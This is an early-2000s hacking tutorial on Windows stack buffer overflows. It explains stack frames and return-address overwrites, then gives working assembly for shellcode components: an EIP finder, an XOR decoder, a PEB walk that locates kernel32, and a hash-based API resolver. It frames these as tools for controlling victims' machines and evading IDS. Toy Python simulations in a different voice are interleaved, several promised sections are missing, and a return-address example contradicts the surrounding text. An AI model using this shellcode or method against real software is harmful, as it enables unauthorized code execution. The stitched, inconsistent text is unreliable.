Smashing the Stack for Fun and Deception
Jaywalker's No-Nonsense Guide to Compromise Security
Category: Computer Security
Platform: Microsoft™ Windows©
Level of Difficulty:
1
2
3
This article builds on advanced knowledge of Assembly language and
Microsoft Windows API programming.
There is no knowledge that is not power.
© Master of Disaster Hacking Group 1998-2004, All rights reserved.
Legal Issues:
The author reserves the rights not to be responsible for topicality, correctness, completeness, fitness, or
quality of the information provided in this document.
I disclaim all other warranties and conditions either implied, expressed, or statutory, including, but not
limited to (If any) implied warranties, duties, and responsibility of merchantability, of fitness, for a
particular purpose, of reliability or availability, of accuracy, of completeness, of responses, of results,
of lack of viruses, of lack of damages, and of negligence, all with regard the article and its peripheral
attachments.
The Master of Disaster Hacking Group reserves the right to change or discontinue this document without prior
notice.
Table of Contents
Foreword
    Introduction
    Abstract
Stack Primer
    Stack Overview
    Stack Frame
Buffer Overflow
    Rundown on Buffer Overflow
    General Considerations
ShellCode
    Breakdown of ShellCode
    Buffer Overrun Mounting
Getting your feet wet!
    ShellCode Development
    Finding EIP
    Decoder
    Locating Kernel32
    Pinpointing Functions
    Migrating to Another Process
    Spawning Shell
    Network Communications
    Avoiding IDS Detection!
What Goodies Are Along This Article?
Closing
References
Foreword
Introduction
Nowadays computer security seems to dominate computer science. As computing
power grows, the demands of software and hardware outrun our ability to keep up
with changes in the field. Not long ago security was of little concern and the masses
showed scant interest in privacy. But ever since cyberpunks hit the streets, new
branches of computer science have been sprouting up. Among them are cryptography,
IDS, enterprise firewalls, and other security-related technologies. More and more
computers are being hooked up to the Net, while many of their users remain oblivious
to the dangers involved. There are a lot of security myths floating around that we
believe are at least as dangerous as the security holes themselves. One of the myths is
that breaching the security of Windows™ is much more difficult than breaching Linux
and UNIX systems; another is that these systems contain more security-critical
vulnerabilities than others. We fight these myths tooth and nail.
What we intend to present is how to breach one of the insecurities that are
commonplace in Windows operating systems. To demonstrate what a real penetration
is like, we have also created a hypothetical vulnerable program and put our attack
tools into practice against it. This serves both as a proof of concept and as our effort
to fight one of those myths, and it should convince you that an effective attack tool
can be created for any system.
The widespread outbreak of the Win32.Sasser and Blaster worms is palpable
testimony to one infamous type of vulnerability, the 'buffer overflow'. These
malicious programs infected numerous computers at a high rate by leveraging buffer
overflows. A buffer overrun can crash an application, or it can have the far more
destructive effect of code injection: if the flaw is exploited properly, the attacker is
able to run code of his choice.
Abstract
Severe security problems can occur when buffers and memory overflow in
applications. I set out to present the details of mounting this type of attack against
applications. I first give a lowdown on the stack and its functions, then proceed to
explain the overflow concept and its ramifications on the execution flow of running
programs. In particular we will cover how to write shellcode to carry out buffer
overflow attacks, how to pass through firewalls with minimal trace using shellcode,
and how to give the attacker the ability to interact with the victim's box. Finally we
will conclude our discourse with new buffer overflow prevention technologies and
their shortcomings.
Stack Primer
Stack Overview
The stack is a region of memory allocated inside a process's address space. A
program mostly uses it to allot memory dynamically for arrays and variables declared
inside functions, or to store data temporarily. The stack also keeps track of where to
return when procedures exit, and it is used to pass parameters to procedures. It works
on a first-in-last-out basis, that is, the first item pushed on the stack is the last to be
popped off it.
In Assembly language the stack position is identified by ESP (Extended Stack Pointer).
When a program's execution begins, ESP points to the end (the highest address) of the
stack. Every time a word (two bytes) is pushed on the stack, ESP is decreased by 2, and
when a word is popped, ESP is increased by 2; in 32-bit code the usual operand is a
doubleword, which moves ESP by 4. In other words, ESP always points to the most
recently pushed item, the top of the stack. An important consideration when using
the stack is to be symmetrical in the byte count of what is pushed and what is popped.
If the stack is not balanced on exit from a procedure, execution resumes at the
wrong address, which will almost always crash the program. In most instances, if
you push a given data size onto the stack, you must pop the same data size. Our
discussion is focused on Intel 32-bit x86-compatible CPUs; what we present is not
applicable to other CPUs such as Intel's 64-bit Itanium (IA64), which has 128
general-purpose r-registers plus 128 floating-point f-registers, not to mention its
8 branch registers! That architecture deserves a full-blown book of its own.
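The push and pop behaviour described above can be modelled in a few lines of Python. This is only a toy sketch: the class name, the starting address 0x0012FFFC and the 64-byte size are assumptions made for illustration, and every push is a 32-bit doubleword.

```python
import struct

class Stack:
    """Toy model of a 32-bit x86 stack that grows toward lower addresses."""

    def __init__(self, base=0x0012FFFC, size=64):
        self.base = base              # hypothetical highest address of the stack region
        self.mem = bytearray(size)    # backing store for addresses [base - size, base)
        self.esp = base               # empty stack: ESP sits at the high end

    def _index(self, addr):
        # Translate a simulated address into an index of the backing store.
        return addr - (self.base - len(self.mem))

    def push(self, value):
        self.esp -= 4                 # PUSH first decrements ESP by the operand size
        i = self._index(self.esp)
        self.mem[i:i + 4] = struct.pack("<I", value)

    def pop(self):
        i = self._index(self.esp)
        (value,) = struct.unpack("<I", self.mem[i:i + 4])
        self.esp += 4                 # POP increments ESP after reading
        return value

stack = Stack()
start = stack.esp
stack.push(0x11111111)
stack.push(0x22222222)
after_two_pushes = stack.esp
first_popped = stack.pop()            # last value pushed comes off first
second_popped = stack.pop()
print(hex(start), hex(after_two_pushes), hex(first_popped), hex(second_popped))
```

After two pushes ESP is eight bytes lower than where it started, and balanced pops bring it back to the starting value.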
Stack Frame
In x86 CPUs, parameters are traditionally passed on the stack. A glance at the
assembly code generated for a function call reveals that a PUSH instruction has been
produced for each parameter. Once all parameters have been pushed on the stack, a
CALL instruction transfers control to the target routine. The CALL instruction pushes
the EIP of the next instruction on the stack so that execution knows where to land
after returning from the procedure. The x86 stack frame uses EBP (Extended Base
Pointer) to access the frame. The stack frame is typically set up at the start of a
procedure by the following code, known as the prologue:
PUSH EBP
MOV EBP,ESP
SUB ESP,XX
where XX is the number of bytes allocated for the local variables of the routine. Below
is a typical figure of a stack frame:
Higher Memory Addresses (Bottom of Stack)
    Passed Parameters
    Return Address
    Previous EBP                  <- EBP
    Exception Handler Frame
    Local Variables
Lower Memory Addresses (Top of Stack)
Typical Stack Frame
The key point here is that a program accesses its parameters via relative addressing
based on EBP. For instance, [EBP+0] holds the saved EBP of the previous stack frame
and [EBP+4] holds the function's return address. The function's passed parameters are
at positive offsets from EBP. The first parameter is at EBP+8, and subsequent
parameters follow at four-byte intervals, that is EBP+0Ch, EBP+10h, and so on. The
function's local variables are at negative offsets from EBP. As usual these rules are
apt to be overturned: many optimizing compilers do not push EBP at all and access
both local variables and passed parameters at positive offsets from ESP. Moreover
some variables can be kept in registers rather than on the stack. Return values are
conventionally stored in the EAX register if they are four bytes or less; an eight-byte
value is returned in the EDX:EAX pair, that is, higher-order bytes in EDX and
lower-order bytes in EAX. As you saw, the stack is composed of stack frames that are
pushed at function entries and popped at function exits. As more data are pushed, the
stack grows down in memory, but keep in mind that ESP always points to the top of
the stack. Stack frames can also be made and cleaned up by the ENTER and LEAVE
instructions. We have not yet said what the exception handler frame is. Compilers use
it to catch run-time errors: it points to a structure known as
EXCEPTION_REGISTRATION, which forms a linked list of handlers. Do you remember
try-except-finally in programming languages like C++, VB .NET and so on? We'll talk
more about it here.
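To make the EBP-relative offsets concrete, here is a small Python model of what the caller's PUSH instructions, the CALL and the callee's prologue leave on the stack. The function name, the addresses and the parameter values are all hypothetical; memory is modelled as a dictionary from address to 32-bit value.

```python
def call_frame(params, return_address, saved_ebp, esp, locals_size):
    """Model the stack after the caller's PUSHes, the CALL and the callee's prologue.

    Returns (memory, ebp, esp), where memory maps addresses to 32-bit values.
    """
    memory = {}

    def push(value):
        nonlocal esp
        esp -= 4
        memory[esp] = value

    for value in reversed(params):   # arguments are pushed right to left
        push(value)
    push(return_address)             # CALL pushes the address of the next instruction
    push(saved_ebp)                  # PUSH EBP
    ebp = esp                        # MOV EBP,ESP
    esp -= locals_size               # SUB ESP,XX reserves room for local variables
    return memory, ebp, esp

memory, ebp, esp = call_frame(
    params=[0xAAAA0001, 0xAAAA0002],
    return_address=0x00401234,       # hypothetical address inside the caller
    saved_ebp=0x0012FFC0,            # hypothetical frame pointer of the caller
    esp=0x0012FF80,                  # hypothetical ESP before the call sequence
    locals_size=16,
)
print(hex(memory[ebp]), hex(memory[ebp + 4]), hex(memory[ebp + 8]), hex(memory[ebp + 0xC]))
```

The saved EBP sits at [EBP], the return address at [EBP+4], the first parameter at [EBP+8] and the second at [EBP+0Ch], while the sixteen bytes below EBP belong to the local variables.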
Buffer Overflow
Rundown on Buffer Overflow
Now suppose that a function writes something on the stack; typically it uses
the space allocated for its local variables to store the data it needs. Some string
functions of C and C++ do not check the string's length properly and are therefore
prone to writing past the space allocated for local variables. Hence in some scenarios
a program can corrupt its own stack by writing more data than was allocated. In doing
so it can modify the saved pointer to the previous stack frame, the return address and
even the passed parameters. The problem surfaces just as the function returns; when
procedures are finished with their job they clean up the stack frame, releasing the
stack space allocated for local variables, with the following epilogue:
ADD ESP,XX
POP EBP
RET
When the CPU leaves the procedure by executing the RET instruction, it takes the
'Return Address' from the stack as the new execution point and starts running code at
that location. If the stack has been overwritten with no special plan ahead of time,
control branches either to a location holding arbitrary bytes that get executed as code,
or to a location the program has no access to. The latter case leads to an access
violation error at once and the program terminates. In the former case arbitrary code
runs, and within a few bytes the program crashes anyway, either because it jumps to
an unavailable location or because it ends up like the latter case.
So far we have learned that a stack overflow can seize control of execution or
can rip it to shreds. Nonetheless we intentionally want to cause it, because it
empowers us to rule over the crashed program. The question now boils down to
'How?'.
We must feed the target application with specially crafted data, arranged so that the
overwritten return address lands us at the location of our choice. Thus we are able
to grab control and force the overrun program to execute at the location we want. This
location is the very place where our data overflowed the stack. In other words, we
inject runnable code on the stack, and this code gets its chance to run after the buffer
overflow hits.
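The effect of an unchecked copy on the saved return address can be reproduced harmlessly in a simulation. The sketch below is not an exploit: it models a frame as a Python bytearray laid out as local buffer, saved EBP, return address, and all sizes and addresses are assumptions chosen for illustration. It also shows that a length-checked copy leaves the return address alone.

```python
import struct

BUFFER_SIZE = 16   # assumed size of the local buffer in this toy frame

def make_frame(return_address, saved_ebp):
    """Lay out [local buffer][saved EBP][return address] from low to high addresses."""
    return bytearray(BUFFER_SIZE) + struct.pack("<II", saved_ebp, return_address)

def unchecked_copy(frame, data):
    """Copy with no regard for BUFFER_SIZE, the way strcpy-style routines behave."""
    n = min(len(data), len(frame))   # clamp only so the toy frame keeps its size
    frame[0:n] = data[:n]

def checked_copy(frame, data):
    """Copy at most BUFFER_SIZE bytes, so nothing beyond the buffer is touched."""
    chunk = data[:BUFFER_SIZE]
    frame[0:len(chunk)] = chunk

def return_address(frame):
    # The return address sits after the buffer and the 4-byte saved EBP.
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]

oversized = b"A" * 24                # 8 bytes more than the buffer can hold

smashed = make_frame(return_address=0x00401234, saved_ebp=0x0012FFC0)
unchecked_copy(smashed, oversized)

intact = make_frame(return_address=0x00401234, saved_ebp=0x0012FFC0)
checked_copy(intact, oversized)

print(hex(return_address(smashed)))  # 0x41414141
print(hex(return_address(intact)))   # 0x401234
```

In the smashed frame the return address has become 0x41414141 (four 'A' characters), which is exactly the kind of value a debugger shows in EIP when an overflow has been triggered without a plan.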
General Considerations
By now you should be familiar with the concept of this kind of attack. To
recap, we inject assembly opcodes plus a return address into the program; when it
copies this unusually large data onto the stack, the return address is replaced by our
own; upon return, this address places us in the middle of the data on the stack, that is,
our code, and our crafted code assumes power from that minute. The code that gets a
piggyback ride on the crashed program is called the 'payload'; if the payload spawns a
shell it is called 'shellcode'. Shellcode is written in assembly language and then
assembled; the .text section of the resulting PE file is then extracted to form the
runnable part of the shellcode.
What to consider in a buffer overflow attack?
1. Our shellcode must conform to the protocol by which it is being transferred.
2. The return address must be such that it jumps right onto the shellcode, so that
our injected shellcode gets an opportunity to run.
3. Having a robust shellcode is a must.
Now the solution to each question posed:
1. Some protocols impose further constraints on us; for example, they may not
accept zero characters or other special characters, so we must write shellcode
that contains no zero character. To overcome this issue we encode our
shellcode and prepend a small decoder so that it is decoded before running.
The simplest encode-decode scheme is to XOR the shellcode with a single
byte, so that the decoder and encoder are the same operation. If the shellcode
is transferred over TCP or UDP we are at the mercy of the target program;
some programs do not accept special characters, especially zeros.
2. Running processes almost always start execution at addresses like 0x00400000
or so, which causes a further problem for us since every instruction in the code
will be around this number. The trouble with this number is that it contains
zero bytes. Suppose that a console application is our target and we need to
feed it the return address; because of the zero bytes we cannot key it in. This
problem can be overcome with ease. We look up the names of the
dependencies the application loads at startup. Knowing the context in which
the target runs at the time of the exploit, we see which registers point roughly
to our shellcode and choose one; if there is nothing other than ESP, we choose
it. Then we search each dependency for a 'JMP ESP' (in hex 'FFE4') or a
'CALL ESP' (in hex 'FFD4'). A program's dependencies such as ntdll.dll,
kernel32.dll, user32.dll, ... are loaded at predefined base addresses; for
example, in WinXP SP1 there is a 'jmp eax' in kernel32.dll at address
0x77E6FA88. We set the return address to this value, so when the function
returns it jumps to this address in kernel32.dll, and that jump places us at the
shellcode. So the shellcode gets to run at this stage.
3. Shellcode must be robust, because we have no idea exactly where it will start
running. If we need to call API functions we need to know where in memory
we are, at what address the kernel32 base is, and so forth. Shellcode must also
be relocatable, that is, able to run anywhere in memory such as the heap, the
stack or a data segment. To achieve this we use the relative addressing feature
of assembly language.
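Two of the points above are easy to check in isolation: whether a 32-bit address contains a zero byte once it is laid out in little-endian order, and the fact that XOR with a single byte is its own inverse. The following Python sketch does both on plain byte strings; the helper names and the sample data are made up for illustration.

```python
import struct

def has_zero_byte(address):
    """True if the little-endian encoding of a 32-bit address contains a 00 byte."""
    return 0 in struct.pack("<I", address)

def xor_bytes(data, key):
    """XOR every byte with the same key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)

def keys_without_zero_output(data):
    """Keys for which xor_bytes(data, key) contains no zero byte.

    A byte only becomes zero when it equals the key, so any non-zero value
    that does not occur in the data qualifies.
    """
    present = set(data)
    return [k for k in range(1, 256) if k not in present]

print(has_zero_byte(0x00400000))   # True: typical image base of an executable
print(has_zero_byte(0x77E6FA88))   # False: the kernel32 address quoted above

sample = bytes([0x00, 0x41, 0x00, 0x7F])        # arbitrary data containing zeros
key = keys_without_zero_output(sample)[0]
encoded = xor_bytes(sample, key)
decoded = xor_bytes(encoded, key)
print(key, encoded.hex(), decoded == sample)
```

The same function serves as encoder and decoder, which is why the text calls single-byte XOR the simplest scheme.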
ShellCode
Breakdown of ShellCode
An exploit consists of two major components:
1. Exploitation technique and 2. Payload
The objective of the exploitation technique is to divert the execution path of the
vulnerable program. We can achieve this via a variety of methods:
Stack-based Buffer Overflow
Heap-based Buffer Overflow
Format String
Integer Overflow
Memory Corruption
Each vulnerability has a different method to trigger it. Yet shellcode can be written to
be reused. The code of our choice, the payload, can theoretically do anything on the
target computer under the security context of the vulnerable program. If the target
program is a system service, the payload can take full control of the system without
any limitation. Shellcode can give the attacker an interactive command prompt to
further his cause. The attacker may explore the target system to discover the network
structure and to penetrate other vulnerable systems. A simple 'net view /domain'
reveals a lot of facts. The shell may also allow the attacker to upload or download
files and to install trojans or backdoors, a keylogger or sniffer, an enterprise worm or
rootkits (special hacking tools that give full anonymity in the system even at
kernel-mode level; with rootkits the attacker can cover his tracks through the
system). Shellcode can also wait for commands from the attacker.
Buffer Overrun Mounting
The payload is comprised of a sequence of code pieces. First we put a
prologue; it can be a xor-decoder or some other garbage code. Why garbage? Because
sometimes the return address will put us somewhere in the middle of our payload.
Taking this into account, we put several NOPs before the decoder; the NOP opcode is
0x90, so the beginning of many shellcodes is full of 90's. After the shellcode we place
the return address (pointing to a jump instruction in kernel32 or ntdll) so that when
execution diverts, it puts us back in the shellcode. The smashed stack must look like
the following after the payload overwrites it:
Stack of target:
    90 90 90 90 90 90 90 90 90 90 ...      (NOPs)
    Xor-Decoder
    ShellCode
    modified return address  -->  JMP ESP or so (Kernel32 or other dependencies of target)
                                  -->  Execution is diverted to our shellcode
Smashed Stack
Some C/C++ functions like strcpy, wcscpy, scanf, ... and a couple of API functions like
lstrcat, lstrcpy, lstrlen, wsprintf, GetAtomName, LoadString, GetMenuString are
subject to buffer overrun attacks. That is because these functions do not check string
length properly and just copy the string from source to destination.
Getting your feet wet!
ShellCode Development
While each vulnerability has a different method of exploitation, the shellcode
can be written to be flexible and reusable. In Microsoft Windows, shellcode must first
find its own location in memory and decode its executable part. Then it should find
the kernel32 base address in order to call the API functions it needs.
Finding EIP
Assembly language has no instruction to read EIP directly; however, EIP keeps
changing as the CPU executes opcodes. Knowing that the CALL instruction changes
EIP and pushes a copy of the return address on the stack, we can find EIP easily as
follows:
CALL $+5 ; the near CALL is five bytes long, so this targets the next instruction
POP ESI ; ESI will contain the address of this POP instruction
The CALL instruction diverts execution flow to the next instruction (POP ESI) and
stores the address of that instruction on the stack; the next opcode pops it off the
stack and puts it into ESI.
Decoder
The decoder uses a simple algorithm, just the reverse of the encoder. The
encoder XORs each byte with a predefined byte and then adds one to it, so for
decoding we first subtract one and then XOR the result with the same predefined
value. The following snippet both finds the location in the shellcode where the
decoder must start its job and decodes it afterward:
pXore Proc
    CLD                 ; Clear direction flag, so string operations will increase both EDI and ESI
    JMP $ + 24          ; Jump at 'CALL $ - 22'
    POP ESI             ; Pops EIP, EIP will exactly point to location of opcodes just after 'CALL $ - 22'
    PUSH ESI            ; Save a copy of ESI
    MOV EDI , ESI       ; Means both source and destination of string operation point to encoded opcodes
    XOR ECX , ECX       ; Zero out ECX and get ready for loop
    MOV CX , 0123h      ; 0123h depends on length of encoded shellcode
    LODSB               ; Load one byte of encoded shellcode and put into AL
    SUB AL , 1          ; Subtract one from it
    XOR AL , 0F6h       ; Xor result with predefined byte
    STOSB               ; Store decoded shellcode back to its original location
    LOOP $ - 6          ; Loop back to LODSB
    JMP $ + 4           ; Jump at the decoded shellcode and run it smoothly
    CALL $ - 22         ; CALL the instruction 'POP ESI'
pXore Endp
I hope the above code is self-explanatory.
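As a cross-check of the arithmetic only, the XOR-then-add-one scheme can be modelled on plain bytes in Python. This is a sketch of the transformation as the text describes it, not the author's tooling; the function names are made up, and the key 0F6h is simply the constant that appears in the listing.

```python
KEY = 0xF6   # the predefined byte that appears in the decoder listing

def encode(data, key=KEY):
    """XOR each byte with the key, then add one (modulo 256)."""
    return bytes(((b ^ key) + 1) & 0xFF for b in data)

def decode(data, key=KEY):
    """Reverse order of operations: subtract one (modulo 256), then XOR with the key."""
    return bytes(((b - 1) & 0xFF) ^ key for b in data)

sample = bytes(range(256))            # every possible byte value
round_trip_ok = decode(encode(sample)) == sample
print(round_trip_ok)
```

Because the addition wraps around at 256, the round trip holds for every byte value, and the decoder has to undo the two steps in the opposite order from the encoder.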
Locating Kernel32
To call API functions one must use LoadLibrary and GetProcAddress,
but using these functions requires knowledge of their location in memory. I present a
general method for locating kernel32 in memory that is independent of the system
platform. The answer lies in the TEB (Thread Environment Block), a special structure
present in the memory space of each thread running in Windows. Though an
undocumented structure, it has been reverse engineered and its source is widely
published. Each thread reaches its own TEB through the FS segment register (the
TEB's linear address is stored at FS:[18h]). The TEB contains all sorts of information
including the environment pointer, active RPC info, PEB, last error code, thread info,
thread locale, exception code, GDI pen, brush, region, TLS location, stack commit
max and so forth. As a matter of fact FS is an important register for every thread in
Windows: FS:[00h] points to the SEH (Structured Exception Handling) chain,
FS:[04h] to the top of the user stack, FS:[08h] to the base of the user stack, FS:[10h]
to the fiber data field, FS:[20h] holds the process ID and FS:[24h] the thread ID.
Among these fields, at offset 30h of the TEB we find a pointer to the PEB (Process
Environment Block). The PEB is documented neither in the SDK nor in the DDK, but
it can be viewed with a kernel-mode debugger like WinDbg. At offset 0Ch of the PEB
we reach LoaderData, a pointer to another structure called PEB_LDR_DATA.
typedef struct _TEB {
    NT_TIB      Tib;
    PVOID       EnvironmentPointer;
    CLIENT_ID   Cid;
    PVOID       ActiveRpcInfo;
    PVOID       ThreadLocalStoragePointer;
    PPEB        Peb;
    ULONG       LastErrorValue;
    ULONG       CountOfOwnedCriticalSections;
    ...
    PVOID       StackCommit;
    PVOID       StackCommitMax;
    PVOID       StackReserved;
} TEB, *PTEB;

typedef struct _PEB {
    BOOLEAN     InheritedAddressSpace;
    BOOLEAN     ReadImageFileExecOptions;
    BOOLEAN     BeingDebugged;
    BOOLEAN     Spare;
    HANDLE      Mutant;
    PVOID       ImageBaseAddress;
    PPEB_LDR_DATA                   LoaderData;
    PRTL_USER_PROCESS_PARAMETERS    ProcessParameters;
    PVOID       SubSystemData;
    ...
    ULONG       TlsExpansionBitmap;
    BYTE        TlsExpansionBitmapBits[0x80];
    ULONG       SessionId;
} PEB, *PPEB;

typedef struct _PEB_LDR_DATA {
    ULONG       Length;
    BOOLEAN     Initialized;
    PVOID       SsHandle;
    LIST_ENTRY  InLoadOrderModuleList;
    LIST_ENTRY  InMemoryOrderModuleList;
    LIST_ENTRY  InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

struct LIST_ENTRY{
    struct LIST_ENTRY* Flink;
    struct LIST_ENTRY* Blink;
};
As you see, PEB_LDR_DATA has a member called InInitializationOrderModuleList
at offset 1Ch, a structure of LIST_ENTRY type. It heads a linked list that has
information about every module loaded by the process. The first entry in this list
belongs to ntdll; by walking down the list we reach the second entry, which leads to
the base address of kernel32. Following is the equivalent assembly code that puts the
base address of kernel32 in EDX:
LocateKernel Proc
    assume fs:nothing       ;Remove any assembler's prior assumptions from fs
    mov eax,fs:[30h]        ;Get pointer to PEB structure at offset 30h in TEB
    mov eax,[eax+0Ch]       ;Get PEB_LDR_DATA
    mov esi,[eax+1Ch]       ;Get InInitializationOrderModuleList in PEB_LDR_DATA
    lodsd                   ;Load dword from ds:[esi] into eax
    mov edx,[eax+8h]        ;Get second entry on table, that is kernel32
LocateKernel Endp
FS register -> TEB --(30h)--> PEB --(0Ch)--> PEB_LDR_DATA --(1Ch)--> LIST_ENTRY: ntdll -> kernel32 -> other modules
Schematic of our procedure
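The chain of pointers in the schematic can be followed on a toy memory map without touching a real process. In the Python sketch below every address and module base is invented, and memory is just a dictionary from address to 32-bit value; only the offsets (30h, 0Ch, 1Ch, the Flink at offset 0 and the base address 8 bytes past the list links) are taken from the text.

```python
def read_dword(memory, address):
    """Read a 32-bit value from the simulated memory map."""
    return memory[address]

def locate_second_module(memory, teb):
    """Follow the same offsets as the LocateKernel listing on simulated memory."""
    peb = read_dword(memory, teb + 0x30)      # mov eax,fs:[30h]
    ldr = read_dword(memory, peb + 0x0C)      # mov eax,[eax+0Ch]
    first = read_dword(memory, ldr + 0x1C)    # mov esi,[eax+1Ch]  first list entry
    second = read_dword(memory, first)        # lodsd              follow its Flink
    return read_dword(memory, second + 0x08)  # mov edx,[eax+8h]   module base address

# Hypothetical addresses, chosen only so the chain has something to follow.
TEB, PEB, LDR = 0x7FFDE000, 0x7FFDF000, 0x00241E90
ENTRY_NTDLL, ENTRY_KERNEL32 = 0x00241F28, 0x00241FD0
NTDLL_BASE, KERNEL32_BASE = 0x77F50000, 0x77E60000

memory = {
    TEB + 0x30: PEB,
    PEB + 0x0C: LDR,
    LDR + 0x1C: ENTRY_NTDLL,
    ENTRY_NTDLL: ENTRY_KERNEL32,          # Flink of the first entry
    ENTRY_NTDLL + 0x08: NTDLL_BASE,
    ENTRY_KERNEL32: LDR + 0x1C,           # Flink of the second entry (toy list ends here)
    ENTRY_KERNEL32 + 0x08: KERNEL32_BASE,
}

found = locate_second_module(memory, TEB)
print(hex(found))
```

The walk depends entirely on the second entry of the initialization-order list being kernel32, as the text states for the systems it targets; the sketch makes that assumption visible as a single Flink dereference.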
Pinpointing Functions
Having found the base of kernel32, we have no problem retrieving our desired
API functions from it. Since a PE file in memory has a structure very similar to its
format on hard disk, and the format is well documented, we can find the function
pointers we need. From the SDK documentation, each PE file starts with an
IMAGE_DOS_HEADER followed by an MS-DOS stub and IMAGE_NT_HEADERS
(which contains IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER); the PE
sections succeed them all.
At offset 3Ch of IMAGE_DOS_HEADER (the first header), there is the offset of
IMAGE_NT_HEADERS. At offset 78h of that structure we find the first DataDirectory
entry; this first entry points to IMAGE_EXPORT_DIRECTORY, the second to
IMAGE_IMPORT_DIRECTORY. From the export directory we get a pointer to
AddressOfFunctions, which leads to the RVAs (Relative Virtual Addresses, that is,
relative to the base of the image) of all functions exported by kernel32. To find the
location of a function exported by kernel32, we store a hash of its name instead of the
name itself to save space; at run-time we compute the hash of each exported function
name (pointed to by AddressOfNames) and compare it with our own hash. If they are
the same we take it that we have found the right function. The hash function is a
simple algorithm based on sum and rotation. Following is the complete
GetProcAddress replacement for finding the address of any function, given that EDX
holds the base address of kernel32 and ECX holds the hash of the function name.
GetProcAdd Proc
;Simulated GetProcAddress, it looks for signature of function in module export table
cld
;Clear Direction Flag , makes esi,edi to increment after string instructions.
mov esi,edx
;EDX = module base address
;see "PE format.txt" for details of PE file formats
movzx ebx,word ptr [esi+3Ch] ;Retrieve pointer to IMAGE_NT_HEADERS, located just after IMAGE_DOS_HEADER
mov esi,[esi+ebx+78h]
;load first RVA IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.DATADIRECTORY[0].VirtualAddress
lea esi,[edx+esi+1Ch]
;The first element of array is always the address and size of the exported function table.
;The second array entry is the address and size of the imported function table.
;1Ch=((IMAGE_EXPORT_DIRECTORY *)VirtualAddress)->AddressOfFunctions
lodsd
;load function table address
add eax,edx
;RVA to VA
push eax
;Save function table address
lodsd
;Address of names, also esi is incremented
add eax,edx
;RVA to VA
push eax
;Save address of names
lodsd
;Address of ordinals
add eax,edx
;RVA to VA
pop ebx
;ebx=address of names
push eax
;Save address of ordinals
xor eax,eax
;Index
i1:
mov esi,[4*eax+ebx] ;Pointer to address of exported function names
add esi,edx
;RVA to VA; at first run, esi is pointing to the name of ActivateActCtx (1st kernel32 func name!!!) and so forth.
push eax
push ebx
xor ebx,ebx
i2:
xor eax,eax
lodsb
;Load byte at [esi] into al, it is actually the current character of the function name
rol ebx,5
;Rotate 5 bits to left
add ebx,eax
cmp eax,0
jnz i2
;Go on if we have not yet reached end of the string
ror ebx,5
cmp ebx,ecx
;Compare hashes
pop ebx
pop eax
je i3
;Function found
inc eax
jmp i1
;Try next function
i3:
pop ebx
movzx esi,word ptr [ebx+2*eax]
;Get index out of ordinals table, note that ordinal is 2 bytes
pop eax
mov esi,[eax+esi*4]
;Get function address in memory from "address of functions table"
add esi,edx
;RVA to VA
ret
;We managed to finagle the function address and put it into esi!
GetProcAdd Endp
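The sum-and-rotation hash in the listing can be written out in Python to make the arithmetic explicit. This is a reading of the inner loop at label i2, not a tool taken from the article: for every character the running value is rotated left by five bits and the character is added; the terminating zero byte triggers one more rotation, which the final `ror ebx,5` undoes. The function names are invented for this sketch.

```python
def rol32(value, count):
    """Rotate a 32-bit value left by count bits."""
    value &= 0xFFFFFFFF
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF

def name_hash(name):
    """Rotate-left-by-5 and add, over the ASCII characters of an export name.

    The rotation applied for the terminating zero byte in the assembly is
    cancelled by the trailing 'ror ebx,5', so it is simply omitted here.
    """
    h = 0
    for ch in name.encode("ascii"):
        h = (rol32(h, 5) + ch) & 0xFFFFFFFF
    return h

print(hex(name_hash("A")))    # 0x41
print(hex(name_hash("AB")))   # 0x862
```

If the constants quoted in the article were produced by this loop, `name_hash("GetSystemDirectoryA")` should reproduce them; that has not been verified here. Analysts use the same kind of helper in the other direction, hashing every export name of a DLL to find out which function a constant in a captured sample refers to.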
The GetProcAdd routine above is basically simple if you read it thoroughly; it does
the same job as GetProcAddress in the Windows API. To recap, it first retrieves a
pointer to the export table of kernel32, and from there it finds AddressOfFunctions,
AddressOfNames and AddressOfNameOrdinals and traverses the list of function
names, hashing each name and comparing it with the value of our own hash in ECX; if
the two match, we have reached the correct function. At this point we can sit back and
call any function we fancy, and it is a simple matter for our shellcode to start its job
on the attacked system.
For example, if you want to call the function GetSystemDirectory from kernel32 and
discover the path to the system directory from shellcode, just hash the real name of
the function in kernel32, which is GetSystemDirectoryA. The result of hashing will be
AACCFB39h, so the following code will call the function:
MOV ECX , 0AACCFB39h ; Put hash of GetSystemDirectoryA in ECX
CALL LocateKernel ; Find base address of kernel32
CALL GetProcAdd ; Find address of function in memory and put it into ESI
CALL ESI ; Calling ESI is equivalent to calling the function directly!
Module Image (from offset 0): IMAGE-DOS-HEADER, MS-DOS Stub Program, IMAGE-NT-HEADERS, IMAGE-OPTIONAL-HEADER (Data Directory), Section header 1, Section header 2, ....., Section 1, Section 2, .....
Image Export Directory (offset 1Ch): Functions, Names, Ordinals -> GetSystemDirectory -> Address
Schematic View of Algorithm
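The two header offsets used by the routine (3Ch in the DOS header and 78h in the NT headers) can be tried out on a synthetic buffer with Python's struct module. The sketch below builds a minimal fake image in memory rather than reading a real DLL; the helper names and the values 80h and 1000h are assumptions, and the 78h offset applies to 32-bit (PE32) images only. Note that the field at 3Ch is a 32-bit value in the PE format, although the listing reads just its low word.

```python
import struct

def export_directory_rva(image):
    """Return the RVA stored in DataDirectory[0] of a 32-bit PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)   # offset of IMAGE_NT_HEADERS
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # 4-byte signature + 20-byte file header + 96 bytes of optional header = 78h
    (rva,) = struct.unpack_from("<I", image, e_lfanew + 0x78)
    return rva

def make_toy_image(e_lfanew=0x80, export_rva=0x1000):
    """Build a buffer holding only the fields that export_directory_rva reads."""
    image = bytearray(e_lfanew + 0x80)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<I", image, e_lfanew + 0x78, export_rva)
    return bytes(image)

toy = make_toy_image()
rva = export_directory_rva(toy)
print(hex(rva))   # 0x1000
```

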